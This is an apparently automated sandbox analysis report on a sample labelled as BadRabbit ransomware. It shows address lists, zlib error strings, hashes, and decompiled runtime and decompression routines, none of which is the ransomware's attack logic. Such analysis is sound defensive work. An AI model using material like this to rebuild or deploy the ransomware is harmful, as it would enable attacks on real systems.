0x01321b66
0x01321b68
0x01321b6a
0x01321b6d
0x01321b70
0x01321b72
0x01321b74
0x01321b77
0x01321b7a
0x01321b7d
0x01321b82
0x01321b84
0x01321b87
0x01321b8d
0x01321b89
0x01321b89
0x01321b89
0x01321b8f
0x01321b8f
0x01321b92
0x01321b92
0x01321b98
0x01321b9d
0x01321ba0
0x01321ba0
0x01321b72
0x01321ba3
0x01321baa
0x01321bad
0x01321bb8
0x01321bb8
0x01321bbb
0x01321bbe
0x01321bc1
0x01321bc4
0x01321bc4
0x01321bc4
0x01321bc4
0x01321bc7
0x01321bc9
0x01321bcc
0x00000000
0x01321bd2
0x00000000
0x01321bd2
0x00000000
0x01321be4
0x01321be4
0x01321be6
0x01321be6
0x01321bed
0x01321c73
0x01321c76
0x01321c78
0x01321c7a
0x01321c7a
0x01321c7d
0x01321c7d
0x01321c7f
0x01321c85
0x00000000
0x01321c85
0x01321bf3
0x01321bf5
0x00000000
0x00000000
0x01321bfb
0x01321bfe
0x01321c00
0x01321c00
0x01321c03
0x01321c03
0x01321c07
0x01321c08
0x01321c0b
0x01321c0e
0x01321c11
0x01321c13
0x01321c15
0x01321c18
0x01321c1a
0x01321c1c
0x01321c1f
0x01321c22
0x01321c24
0x01321c27
0x01321c2a
0x01321c2d
0x01321c2d
0x01321c2d
0x01321c30
0x01321c30
0x01321c22
0x01321c33
0x01321c33
0x01321c33
0x01321c36
0x01321c3a
0x00000000
0x00000000
0x01321c3c
0x01321c3e
0x00000000
0x00000000
0x00000000
0x01321c3e
0x01321c40
0x01321c47
0x01321c47
0x01321c4a
0x01321c56
0x01321c59
0x01321c59
0x01321c5c
0x01321c5f
0x01321c62
0x01321c64
0x01321c68
0x01321c6b
0x00000000
0x01321c71
0x00000000
0x01321c71
0x00000000
0x01321c8a
0x01321c8a
0x01321c8c
0x01321c8c
0x01321c93
0x01321d19
0x01321d1c
0x01321d1e
0x01321d20
0x01321d20
0x01321d23
0x01321d23
0x01321d26
0x00000000
0x01321d26
0x01321c99
0x01321c9b
0x00000000
0x00000000
0x01321ca1
0x01321ca4
0x01321ca6
0x01321ca6
0x01321ca9
0x01321ca9
0x01321cad
0x01321cae
0x01321cb1
0x01321cb4
0x01321cb7
0x01321cb9
0x01321cbb
0x01321cbe
0x01321cc0
0x01321cc2
0x01321cc5
0x01321cc8
0x01321cca
0x01321ccd
0x01321cd0
0x01321cd3
0x01321cd3
0x01321cd3
0x01321cd6
0x01321cd6
0x01321cc8
0x01321cd9
0x01321cd9
0x01321cd9
0x01321cdc
0x01321ce0
0x00000000
0x00000000
0x01321ce2
0x01321ce4
0x00000000
0x00000000
0x00000000
0x01321ce4
0x01321ce6
0x01321ced
0x01321ced
0x01321cf0
0x01321cfc
0x01321cff
0x01321cff
0x01321d02
0x01321d05
0x01321d08
0x01321d0a
0x01321d0e
0x01321d11
0x00000000
0x01321d17
0x00000000
0x01321d17
0x00000000
0x01321d2c
0x01321d2c
0x01321d33
0x01321d8c
0x01321d8c
0x01321d8e
0x01321d8e
0x01321d91
0x01321d93
0x01321d98
0x01321d9b
0x01321d9b
0x01321d9e
0x01321da1
0x01321da4
0x01321da4
0x01321dae
0x01321db3
0x01321db6
0x01321db9
0x00000000
0x01321db9
0x01321d35
0x01321d37
0x01321d38
0x01321d3a
0x01321d6c
0x01321d6c
0x01321d70
0x01321d72
0x01321d80
0x01321d82
0x01321d84
0x01321d87
0x00000000
0x01321d87
0x01321d74
0x00000000
0x01321d74
0x01321d3c
0x01321d3c
0x01321d3f
0x01321d3f
0x01321d41
0x00000000
0x00000000
0x01321d47
0x01321d4b
0x01321d4e
0x01321d50
0x01321d52
0x01321d55
0x01321d58
0x01321d5a
0x01321d5a
0x01321d5d
0x01321d5e
0x01321d61
0x01321d64
0x01321d67
0x01321d6a
0x00000000
0x00000000
0x00000000
0x01321d6a
0x00000000
0x00000000
0x01321ddc
0x01321ddf
0x01321e0e
0x01321e0e
0x01321e10
0x01321e15
0x01321e19
0x01321e1c
0x01321e20
0x01321e23
0x01321e25
0x01321e28
0x01321e2a
0x01321e2d
0x01321e30
0x01321e32
0x01321e35
0x01321e38
0x01321e3a
0x01321e3c
0x01321e42
0x01321e45
0x00000000
0x01321e45
0x01321de1
0x01321de4
0x01321de4
0x01321de6
0x00000000
0x00000000
0x01321dec
0x01321df0
0x01321df3
0x01321df5
0x01321df7
0x01321dfa
0x01321dfd
0x01321dff
0x01321e02
0x01321e03
0x01321e06
0x01321e09
0x01321e0c
0x00000000
0x00000000
0x00000000
0x01321e0c
0x00000000
0x00000000
0x01321e49
0x01321e49
0x01321e4b
0x01321e4b
0x01321e4e
0x01322a18
0x01322a1b
0x01322a1e
0x01322a21
0x01322a24
0x01322a27
0x01322a29
0x01322a2c
0x01322a2f
0x01322a32
0x00000000
0x01322a32
0x01321e57
0x01321e5c
0x01321e5f
0x01321e62
0x01321e65
0x01321e68
0x00000000
0x00000000
0x01321e6e
0x01321e6e
0x01321e72
0x00000000
0x00000000
0x01321e78
0x01321e7c
0x00000000
0x00000000
0x00000000
0x00000000
0x01321e82
0x01321e82
0x01321e86
0x01321ea2
0x01321ea5
0x01321ed4
0x01321ed4
0x01321ed6
0x01321edb
0x01321ee0
0x01321ee3
0x01321ee3
0x01321ee6
0x01321f2a
0x01321f30
0x01321f30
0x01321f33
0x013218eb
0x013218eb
0x013218ee
0x00000000
0x013218ee
0x01321ee8
0x01321ee8
0x01321ee9
0x01321f08
0x01321f10
0x01321f16
0x01321f1a
0x00000000
0x00000000
0x01321f1c
0x01321f1f
0x01321f22
0x00000000
0x01321f22
0x01321eeb
0x01321eeb
0x01321eec
0x01321f00
0x01321f02
0x01321f03
0x01321eee
0x01321eee
0x01321eee
0x01321eef
0x01321ef1
0x01321ef8
0x01321ef8
0x01321eef
0x00000000
0x01321eec
0x01321ea7
0x01321eaa
0x01321eaa
0x01321eac
0x00000000
0x00000000
0x01321eb2
0x01321eb6
0x01321eb9
0x01321ebb
0x01321ebd
0x01321ec0
0x01321ec3
0x01321ec5
0x01321ec8
0x01321ec9
0x01321ecc
0x01321ecf
0x01321ed2
0x00000000
0x00000000
0x00000000
0x01321ed2
0x00000000
0x01321eaa
0x01321e88
0x01321e8a
0x01321e90
0x01321e93
0x01321e95
0x01321e97
0x01321e9a
0x00000000
0x00000000
0x01321f3d
0x01321f40
0x01321f42
0x01321f44
0x01321f47
0x01321f4a
0x01321f4d
0x01321f7f
0x01321f7f
0x01321f81
0x01321f83
0x01321f85
0x01321f8b
0x01321f8e
0x01321f90
0x01321f9e
0x01321fa0
0x01321fa3
0x01321fa7
0x01321fa9
0x01321fac
0x01321fae
0x01321fb1
0x01321fb4
0x01321fba
0x00000000
0x00000000
0x00000000
0x01321fba
0x01321f92
0x00000000
0x01321f92
0x01321f4f
0x01321f52
0x01321f52
0x01321f55
0x01321f57
0x00000000
0x00000000
0x01321f5d
0x01321f61
0x01321f64
0x01321f66
0x01321f68
0x01321f6b
0x01321f6d
0x01321f70
0x01321f73
0x01321f74
0x01321f77
0x01321f7a
0x01321f7d
0x00000000
0x00000000
0x00000000
0x01321f7d
0x00000000
0x00000000
0x01321fc0
0x01321fc0
0x00000000
0x00000000
0x01321fc6
0x01321fc6
0x01321fc9
0x01321fcb
0x01322012
0x00000000
0x01322012
0x01321fcd
0x01321fcf
0x01321fd2
0x01321fd5
0x01321fd9
0x01321fdc
0x01321fde
0x00000000
0x00000000
0x01321feb
0x01321ff0
0x01321ff3
0x01321ff6
0x01321ff9
0x01321ffc
0x01321ffe
0x01322001
0x01322004
0x01322007
0x0132200a
0x00000000
0x00000000
0x0132201d
0x01322020
0x0132204f
0x0132204f
0x01322051
0x01322054
0x01322057
0x0132205a
0x0132205f
0x01322062
0x01322065
0x01322067
0x0132206a
0x0132206e
0x01322071
0x01322073
0x01322076
0x01322079
0x0132207c
0x0132207f
0x01322086
0x01322089
0x0132209c
0x0132209c
0x00000000
0x0132209c
0x0132208b
0x0132208f
0x00000000
0x00000000
0x01322091
0x01322095
0x01322097
0x01322098
0x00000000
0x01322098
0x01322022
0x01322025
0x01322025
0x01322027
0x00000000
0x00000000
0x0132202d
0x01322031
0x01322034
0x01322036
0x01322038
0x0132203b
0x0132203e
0x01322040
0x01322043
0x01322044
0x01322047
0x0132204a
0x0132204d
0x00000000
0x00000000
0x00000000
0x0132204d
0x00000000
0x00000000
0x01322101
0x01322101
0x01322101
0x01322104
0x01322107
0x00000000
0x00000000
0x013220a8
0x013220ab
0x013220da
0x013220da
0x013220df
0x013220e2
0x013220e5
0x013220e8
0x013220f0
0x013220f5
0x013220f8
0x013220f8
0x013220fb
0x013220fe
0x00000000
0x013220fe
0x013220ad
0x013220b0
0x013220b0
0x013220b2
0x00000000
0x00000000
0x013220b8
0x013220bc
0x013220bf
0x013220c1
0x013220c3
0x013220c6
0x013220c9
0x013220cb
0x013220ce
0x013220cf
0x013220d2
0x013220d5
0x013220d8
0x00000000
0x00000000
0x00000000
0x013220d8
0x00000000
0x013220b0
0x01322120
0x01322120
0x01322124
0x00000000
0x00000000
0x0132210b
0x0132210e
0x01322110
0x01322118
0x0132211d
0x0132211d
0x0132211d
0x0132211d
0x01322126
0x0132212c
0x0132212f
0x01322132
0x01322134
0x01322137
0x0132213d
0x01322148
0x0132214e
0x01322156
0x01322159
0x0132215b
0x0132216f
0x01322173
0x00000000
0x01322173
0x0132215d
0x00000000
0x00000000
0x0132232f
0x0132232f
0x01322332
0x01322335
0x01322338
0x0132233b
0x0132233d
0x00000000
0x00000000
0x00000000
0x00000000
0x013221a1
0x013221a1
0x013221a1
0x013221a4
0x013221a6
0x013221aa
0x013221ac
0x013221ad
0x013221b0
0x013221b5
0x013221b8
0x013221bb
0x013221be
0x013221c0
0x00000000
0x00000000
0x0132217e
0x01322181
0x01322183
0x00000000
0x00000000
0x01322189
0x0132218d
0x01322190
0x01322195
0x01322197
0x0132219b
0x0132219e
0x0132219e
0x0132219e
0x013221c2
0x013221c4
0x013221c6
0x013221c9
0x013221ca
0x013221cd
0x013221ed
0x0132225e
0x01322261
0x01322263
0x01322264
0x01322268
0x0132226b
0x013222b5
0x013222b8
0x013222b8
0x013222b8
0x013222bb
0x013222bd
0x00000000
0x00000000
0x013222bf
0x013222c2
0x013222c4
0x00000000
0x00000000
0x013222ca
0x013222ce
0x013222d1
0x013222d6
0x013222d8
0x013222db
0x013222dd
0x013222e0
0x013222e3
0x013222e3
0x013222e8
0x013222ea
0x013222ec
0x013222ef
0x013222f2
0x013222f4
0x013222f5
0x013222f8
0x013222f8
0x013222fb
0x013222fb
0x013222ff
0x013222ff
0x01322301
0x01322304
0x01322307
0x0132230a
0x0132230d
0x01322310
0x01322313
0x01322315
0x01322351
0x01322358
0x0132235e
0x0132235e
0x01322361
0x01321dbf
0x01321dbf
0x00000000
0x01321dbf
0x01322367
0x01322369
0x01322370
0x0132237e
0x01322384
0x01322387
0x0132238a
0x0132238c
0x0132238f
0x01322395
0x013223a1
0x013223a7
0x013223af
0x013223b2
0x013223b4
0x013223c2
0x013223c5
0x013223c7
0x013223ca
0x013223d4
0x013223dc
0x013223df
0x013223e5
0x013223eb
0x013223f3
0x013223f6
0x013223f8
0x01322406
0x0132240a
0x0132240d
0x01322413
0x00000000
0x00000000
0x01322419
0x00000000
0x01322419
0x013223fa
0x01322164
0x01322164
0x00000000
0x01322164
0x013223b6
0x00000000
0x013223b6
0x01322372
0x00000000
0x01322372
0x01322317
0x0132231a
0x0132231c
0x00000000
0x00000000
0x0132231e
0x01322321
0x01322321
0x01322324
0x01322329
0x0132232c
0x0132232c
0x0132232c
0x00000000
0x01322321
0x0132226d
0x01322270
0x01322270
0x01322270
0x01322273
0x01322275
0x00000000
0x00000000
0x01322277
0x0132227a
0x0132227c
0x00000000
0x00000000
0x01322282
0x01322286
0x01322289
0x0132228e
0x01322290
0x01322293
0x01322295
0x01322298
0x0132229b
0x0132229b
0x013222a0
0x013222a2
0x013222a4
0x013222a7
0x013222aa
0x013222ac
0x013222ad
0x013222b0
0x00000000
0x013222b0
0x013221f1
0x013221f4
0x013221f7
0x013221fa
0x013221fd
0x013221ff
0x01322228
0x01322228
0x0132222b
0x0132222e
0x01322231
0x01322233
0x01322235
0x01322238
0x0132223b
0x0132223d
0x01322345
0x00000000
0x01322345
0x01322243
0x01322248
0x0132224a
0x0132224d
0x01322250
0x01322253
0x01322256
0x00000000
0x00000000
0x00000000
0x00000000
0x01322201
0x01322201
0x01322201
0x01322204
0x01322206
0x00000000
0x00000000
0x0132220d
0x01322210
0x01322213
0x01322216
0x01322218
0x0132221a
0x0132221d
0x01322220
0x01322223
0x01322226
0x00000000
0x00000000
0x00000000
0x01322226
0x00000000
0x01322201
0x013221cf
0x013221d2
0x013221d5
0x013221d8
0x013221da
0x013221dd
0x013221e0
0x013221e5
0x013221e5
0x00000000
0x00000000
0x0132241c
0x0132241c
0x00000000
0x00000000
0x01322422
0x01322422
0x01322425
0x0132248e
0x0132248e
0x01322491
0x01322494
0x0132249b
0x013224a0
0x013224a1
0x013224a3
0x013224a6
0x013224a7
0x013224a9
0x013224ea
0x013224ec
0x013224ef
0x013224f2
0x013224f4
0x00000000
0x00000000
0x013224ae
0x013224b1
0x013224b3
0x00000000
0x00000000
0x013224b9
0x013224bd
0x013224c0
0x013224c2
0x013224c5
0x013224cb
0x013224cd
0x013224d0
0x013224d2
0x013224d5
0x013224d8
0x013224dd
0x013224e0
0x013224e1
0x013224e1
0x013224e4
0x013224e7
0x013224e7
0x013224f6
0x013224f8
0x013225b2
0x013225b4
0x013225b7
0x013225ba
0x013225c0
0x013225c2
0x013225c4
0x013225c6
0x013225c9
0x013225cc
0x013225cf
0x013225d2
0x013225d4
0x013225e1
0x013225e3
0x013225f7
0x013225fa
0x013225fc
0x0132260a
0x0132260d
0x0132260d
0x01322610
0x01322616
0x00000000
0x01322616
0x013225fe
0x01321953
0x01321953
0x00000000
0x01321953
0x013225e5
0x013225ec
0x00000000
0x013225ec
0x013225d6
0x00000000
0x013225d6
0x013224fe
0x01322500
0x00000000
0x00000000
0x01322506
0x01322508
0x0132250b
0x0132250d
0x0132250e
0x01322511
0x01322513
0x01322516
0x01322518
0x0132251b
0x0132251d
0x0132251f
0x01322520
0x01322526
0x01322528
0x0132252b
0x0132252d
0x01322530
0x01322532
0x01322535
0x01322538
0x0132253b
0x0132253e
0x01322541
0x01322543
0x01322545
0x0132259f
0x0132259f
0x013225a2
0x013225a5
0x013225a8
0x013225aa
0x013225aa
0x013225ac
0x00000000
0x00000000
0x00000000
0x00000000
0x01322547
0x01322547
0x01322547
0x0132254a
0x0132254c
0x00000000
0x00000000
0x01322552
0x01322553
0x01322555
0x01322558
0x0132255b
0x0132255e
0x01322561
0x01322567
0x01322569
0x0132256c
0x0132256d
0x01322571
0x01322576
0x0132257a
0x0132257c
0x0132257e
0x01322581
0x01322584
0x01322586
0x01322588
0x0132258b
0x01322590
0x01322593
0x01322596
0x01322598
0x0132259b
0x0132259d
0x00000000
0x00000000
0x00000000
0x0132259d
0x00000000
0x01322547
0x01322427
0x0132242a
0x0132242f
0x00000000
0x00000000
0x01322431
0x01322434
0x01322437
0x0132243a
0x0132243d
0x01322440
0x01322443
0x01322445
0x01322448
0x01322449
0x0132244c
0x0132244f
0x01322454
0x01322457
0x0132245a
0x0132245d
0x01322460
0x01322461
0x01322464
0x01322467
0x01322468
0x0132246b
0x0132246e
0x01322470
0x01322473
0x01322476
0x01322479
0x0132247c
0x01322482
0x01322482
0x00000000
0x00000000
0x01322619
0x01322619
0x0132261c
0x0132261e
0x0132266d
0x0132266d
0x01322670
0x01322676
0x00000000
0x01322676
0x01322620
0x01322622
0x01322650
0x01322650
0x01322652
0x01322654
0x01322655
0x01322659
0x0132265a
0x0132265d
0x0132265f
0x01322661
0x01322664
0x01322664
0x01322664
0x0132266a
0x00000000
0x0132266a
0x01322624
0x01322627
0x01322627
0x01322629
0x00000000
0x00000000
0x0132262f
0x01322633
0x01322636
0x01322638
0x0132263a
0x0132263d
0x01322640
0x01322642
0x01322645
0x01322646
0x01322649
0x0132264c
0x0132264e
0x00000000
0x00000000
0x00000000
0x0132264e
0x00000000
0x00000000
0x0132267c
0x0132267c
0x0132267f
0x01322681
0x01322685
0x01322687
0x01322688
0x0132268b
0x0132268d
0x01322692
0x01322695
0x01322698
0x0132269a
0x013226e4
0x013226e4
0x013226e6
0x01322795
0x01322795
0x0132279a
0x0132279d
0x013227a0
0x013227a6
0x013227a8
0x013227aa
0x013227ad
0x013227b0
0x013227b2
0x013227c0
0x013227c2
0x013227c8
0x013227cb
0x013227ce
0x013227ce
0x013227d1
0x013227d4
0x00000000
0x013227d4
0x013227b4
0x00000000
0x013227b4
0x013226ec
0x013226ee
0x013226f1
0x013226f3
0x013226f4
0x013226f7
0x013226f9
0x013226fc
0x013226fe
0x01322701
0x01322703
0x01322705
0x01322706
0x0132270c
0x0132270e
0x01322711
0x01322713
0x01322716
0x01322718
0x0132271b
0x0132271e
0x01322721
0x01322724
0x01322727
0x01322729
0x0132272b
0x01322785
0x01322785
0x01322788
0x0132278b
0x0132278d
0x0132278f
0x0132278f
0x0132278f
0x00000000
0x00000000
0x00000000
0x00000000
0x0132272d
0x0132272d
0x0132272d
0x01322730
0x01322732
0x00000000
0x00000000
0x01322738
0x01322739
0x0132273b
0x0132273e
0x01322741
0x01322744
0x01322747
0x0132274d
0x0132274f
0x01322752
0x01322753
0x01322757
0x0132275c
0x01322760
0x01322762
0x01322764
0x01322767
0x0132276a
0x0132276c
0x0132276e
0x01322771
0x01322776
0x01322779
0x0132277c
0x0132277e
0x01322781
0x01322783
0x00000000
0x00000000
0x00000000
0x01322783
0x00000000
0x0132272d
0x0132269c
0x0132269f
0x0132269f
0x013226a1
0x00000000
0x00000000
0x013226a7
0x013226aa
0x013226ac
0x013226ad
0x013226b0
0x013226b3
0x013226b9
0x013226bb
0x013226be
0x013226c0
0x013226c3
0x013226c6
0x013226cb
0x013226ce
0x013226cf
0x013226d2
0x013226d5
0x013226d7
0x013226dd
0x013226e0
0x013226e2
0x00000000
0x00000000
0x00000000
0x013226e2
0x00000000
0x00000000
0x013227d7
0x013227d7
0x013227da
0x013227dc
0x0132282c
0x0132282c
0x00000000
0x0132282c
0x013227de
0x013227e0
0x01322811
0x01322811
0x01322813
0x01322815
0x01322816
0x0132281b
0x0132281c
0x0132281e
0x01322820
0x01322823
0x01322823
0x01322823
0x01322829
0x00000000
0x01322829
0x013227e2
0x013227e5
0x013227e5
0x013227e8
0x013227ea
0x00000000
0x00000000
0x013227f0
0x013227f4
0x013227f7
0x013227f9
0x013227fb
0x013227fe
0x01322801
0x01322803
0x01322806
0x01322807
0x0132280a
0x0132280d
0x0132280f
0x00000000
0x00000000
0x00000000
0x0132280f
0x00000000
0x00000000
0x01322832
0x01322832
0x01322835
0x01322837
0x00000000
0x00000000
0x0132283d
0x01322840
0x01322842
0x01322845
0x01322847
0x01322888
0x0132288b
0x0132288b
0x0132288d
0x01322890
0x01322893
0x01322893
0x01322895
0x01322895
0x01322898
0x0132289a
0x0132289d
0x0132289f
0x013228a1
0x013228a4
0x013228a7
0x013228aa
0x013228ad
0x013228ad
0x013228af
0x013228af
0x013228b2
0x013228b4
0x013228b5
0x013228b5
0x013228b5
0x013228b8
0x013228bb
0x013228be
0x013228c1
0x013228c4
0x013228ca
0x013228ca
0x00000000
0x013228c4
0x01322849
0x0132284b
0x0132284e
0x01322865
0x01322865
0x01322868
0x0132286b
0x01322877
0x01322879
0x01322879
0x0132286d
0x0132286d
0x01322870
0x01322873
0x01322873
0x0132287c
0x0132287f
0x01322882
0x01322884
0x00000000
0x01322886
0x00000000
0x01322886
0x01322884
0x01322850
0x01322857
0x00000000
0x00000000
0x01322859
0x00000000
0x00000000
0x013228d5
0x013228d9
0x00000000
0x00000000
0x013228df
0x013228e2
0x013228e5
0x013228e8
0x013228eb
0x013228ed
0x013228f0
0x00000000
0x00000000
0x013228fb
0x013228ff
0x01322900
0x00000000
0x013229c8
0x013229ca
0x013229cd
0x01322a3e
0x01322a3e
0x00000000
0x01322a3e
0x013229cf
0x013229d2
0x00000000
0x00000000
0x013229d4
0x013229d7
0x01322a07
0x01322a07
0x01322a0a
0x01322a39
0x01322a3c
0x00000000
0x01322a3c
0x01322a0c
0x01321899
0x01321899
0x01321dc2
0x01321dc2
0x00000000
0x01321dc2
0x013229d9
0x013229dc
0x013229dc
0x013229de
0x00000000
0x00000000
0x013229e0
0x013229e4
0x013229e7
0x013229e9
0x013229eb
0x013229ee
0x013229f1
0x013229f3
0x013229f6
0x013229f7
0x013229fa
0x013229fd
0x01322a00
0x01322a03
0x00000000
0x00000000
0x01322a05
0x01322a05
0x00000000
0x01322a05
0x00000000
0x00000000
0x01322a44
0x01322a44
0x01322a46
0x00000000
0x00000000
0x01322a49
0x01322a4b
0x01322a4c
0x01322a4c
0x01322a4f
0x01322a4f
0x01322a52
0x01322a52
0x01322a52
0x01322a5b
0x01322a5e
0x01322a61
0x01322a64
0x01322a66
0x01322a6b
0x01322a6e
0x01322a71
0x01322a74
0x01322a77
0x01322a7a
0x01322a91
0x01322a9b
0x01322aa3
0x01322aa5
0x01322ab4
0x01322ab4
0x01322ab6
0x01322ab9
0x01322abc
0x01322abf
0x01322ac2
0x01322ac5
0x01322ac8
0x01322acb
0x01322ace
0x01322ad0
0x01322ad2
0x01322ad7
0x01322ada
0x01322adb
0x01322ade
0x01322ae1
0x01322aea
0x01322ae3
0x01322ae3
0x01322ae3
0x01322aef
0x01322af2
0x01322af2
0x01322af4
0x01322af4
0x01322ad2
0x01322af7
0x01322afa
0x01322b01
0x01322b01
0x00000000
0x01322afc
0x01322afc
0x01322aff
0x01322b06
0x01322b0b
0x01322b12
0x01322b19
0x01322b1c
0x01322b22
0x01322b24
0x01322b27
0x01322b2d
0x01322b2f
0x01322b35
0x01322b35
0x01322b39
0x00000000
0x01322b4b
0x01322b3b
0x01322b3b
0x01322b3e
0x01322b40
0x01322b42
0x01322b43
0x00000000
0x01322b43
0x01322b31
0x01322b33
0x00000000
0x00000000
0x00000000
0x01322b33
0x00000000
0x01322aff
0x01322afa
0x01322aa7
0x00000000
0x01322aa7
0x01322a7c
0x01322a7f
0x00000000
0x00000000
0x01322a81
0x01322a84
0x00000000
0x00000000
0x01322a86
0x01322a89
0x00000000
0x00000000
0x01322a8b
0x01322a8f
0x00000000
0x00000000
0x00000000
0x00000000
0x01322aad
0x01322aad
0x00000000
0x00000000
0x01321dc5
0x01321dc5
0x01321dc7
0x013217be
0x013217b5

Strings

invalid window size, xrefs: 013218FB
8 Oet, xrefs: 01321744, 013217BB, 01322A52, 01321CED, 01321C47, 01322A9A
8 Oet, xrefs: 013217DD, 01322A5E, 013217FB, 01321D3C, 01321D5A, 01321CA6, 01321CD9, 01321C00, 01321C33, 01321BAD, 01321B8F, 01321ACA, 01321AE8, 01321A3D, 01321A5B, 013219BA, 013219D8, 01321914, 01321932, 01321B96, 01321C4D, 01321CF3
8 Oet, xrefs: 01322B1C
unknown compression method, xrefs: 01321892, 0132194C
header crc mismatch, xrefs: 01321D74
incorrect header check, xrefs: 01321904
unknown header flags set, xrefs: 01321966

Memory Dump Source

Source File: 00000001.00000002.279315989.0000000001321000.00000020.00000001.01000000.00000006.sdmp, Offset: 01320000, based on PE: true

Associated: 00000001.00000002.279306762.0000000001320000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.279324500.0000000001324000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.279331497.0000000001329000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1320000_Endermanch@BadRabbit.jbxd

Similarity

API ID:
String ID: 8 Oet$8 Oet$8 Oet$header crc mismatch$incorrect header check$invalid window size$unknown compression method$unknown header flags set
API String ID: 0-3597181670
Opcode ID: 7602052e18b03186a9dd7082b1155b2fc4dc157f917fa8e87a984acf5c0d4ddb
Instruction ID: fb90a4cbe9fe4d4d18e64fe9f19fc8a5754ed4081a90dc588224b5d25bb80be9
Opcode Fuzzy Hash: 7602052e18b03186a9dd7082b1155b2fc4dc157f917fa8e87a984acf5c0d4ddb
Instruction Fuzzy Hash: 5E426C70A00229DFEF18EF5DC9806AEBBF2BF88304F1485A9D855DB646D774DA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01321499 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E01321499(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr* _t25;

				if(__ecx !=  *0x1328000) {
					 *0x1328120 = __eax;
					 *0x132811c = __ecx;
					 *0x1328118 = __edx;
					 *0x1328114 = __ebx;
					 *0x1328110 = __esi;
					 *0x132810c = __edi;
					 *0x1328138 = ss;
					 *0x132812c = cs;
					 *0x1328108 = ds;
					 *0x1328104 = es;
					 *0x1328100 = fs;
					 *0x13280fc = gs;
					asm("pushfd");
					_pop( *0x1328130);
					 *0x1328124 =  *_t25;
					 *0x1328128 = _v0;
					 *0x1328134 =  &_a4;
					 *0x1328070 = 0x10001;
					 *0x132802c =  *0x1328128;
					 *0x1328020 = 0xc0000409;
					 *0x1328024 = 1;
					_v812 =  *0x1328000;
					_v808 =  *0x1328004;
					SetUnhandledExceptionFilter(0);
					__imp__UnhandledExcep(0x1324080);
					return TerminateProcess(GetCurrentProcess(), 0xc0000409);
				} else {
					return __eax;
				}
			}

0x0132149f
0x013214b4
0x013214b9
0x013214bf
0x013214c5
0x013214cb
0x013214d1
0x013214d7
0x013214de
0x013214e5
0x013214ec
0x013214f3
0x013214fa
0x01321501
0x01321502
0x0132150b
0x01321513
0x0132151b
0x01321526
0x01321535
0x0132153a
0x01321544
0x01321553
0x0132155e
0x01321566
0x01321571
0x0132158a
0x013214a1
0x013214a1
0x013214a1

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01321566
UnhandledExcep.KERNEL32(01324080), ref: 01321571
GetCurrentProcess.KERNEL32(C0000409), ref: 0132157C
TerminateProcess.KERNEL32(00000000), ref: 01321583

Strings

Pdet, xrefs: 01321566

Memory Dump Source

Source File: 00000001.00000002.279315989.0000000001321000.00000020.00000001.01000000.00000006.sdmp, Offset: 01320000, based on PE: true

Associated: 00000001.00000002.279306762.0000000001320000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.279324500.0000000001324000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.279331497.0000000001329000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1320000_Endermanch@BadRabbit.jbxd

Similarity

API ID: ProcessUnhandled$CurrentExcepExceptionFilterTerminate
String ID: Pdet
API String ID: 1999905405-3933575557
Opcode ID: 587c7ea7eebedd66573f278a83ca2f7ce8e465ceec79e8753a53249529b1dfb4
Instruction ID: 9c7a9c01b0ea5e8c6240549d4835e9539a2212cb21013ee59802ef6b476615c0
Opcode Fuzzy Hash: 587c7ea7eebedd66573f278a83ca2f7ce8e465ceec79e8753a53249529b1dfb4
Instruction Fuzzy Hash: 5B21BDB9901214EBD370FF69F585A447BFCBB18314F20809EE9089338CE7B869818F59

Uniqueness

Uniqueness Score: -1.00%

Function 01323840 Relevance: 8.1, Strings: 6, Instructions: 578
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E01323840() {
				signed int _t162;
				unsigned int _t170;
				unsigned int _t171;
				signed int _t172;
				signed int _t174;
				signed int _t176;
				signed int _t177;
				signed int _t180;
				signed int _t182;
				unsigned int _t183;
				int _t184;
				int _t192;
				signed char _t198;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				int _t208;
				int _t220;
				signed int _t225;
				signed int _t233;
				signed int _t248;
				signed char _t249;
				unsigned int _t250;
				signed char _t251;
				signed int* _t252;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t262;
				intOrPtr _t267;
				signed char _t274;
				signed int _t275;
				char* _t276;
				signed int _t278;
				signed char _t280;
				signed int _t283;
				signed int _t287;
				int _t288;
				int _t289;
				int _t292;
				int _t294;
				int _t298;
				signed int _t301;
				signed char _t307;
				signed char _t308;
				signed char _t311;
				signed char _t312;
				signed int _t314;
				int _t315;
				int _t316;
				signed char _t318;
				int _t320;
				int _t322;
				int _t326;
				signed int _t329;
				signed char _t332;
				signed char _t333;
				signed char _t335;
				int _t337;
				signed int _t343;
				int _t345;
				intOrPtr _t346;
				intOrPtr _t347;
				unsigned int _t352;
				unsigned int _t357;
				signed int _t360;
				signed int _t361;
				intOrPtr _t362;
				void* _t363;
				intOrPtr* _t374;
				void* _t375;
				intOrPtr* _t383;
				void* _t384;
				signed int _t389;
				void* _t390;
				signed int _t391;
				void* _t396;
				void* _t398;
				intOrPtr* _t405;
				void* _t406;
				signed int _t407;
				void* _t409;
				intOrPtr* _t416;
				void* _t417;
				unsigned int _t422;
				signed int _t423;
				void* _t425;
				signed int* _t426;
				void* _t430;

				asm("pushfd");
				_t426 = _t425 - 0x40;
				asm("cld");
				_t389 = _t426[0x16];
				_t362 =  *((intOrPtr*)(_t389 + 0x1c));
				_t162 =  *_t389;
				_t426[0xb] = _t162;
				_t426[5] =  *((intOrPtr*)(_t389 + 4)) + _t162 - 0xb;
				_t267 =  *((intOrPtr*)(_t389 + 0x10));
				_t248 =  *(_t389 + 0xc);
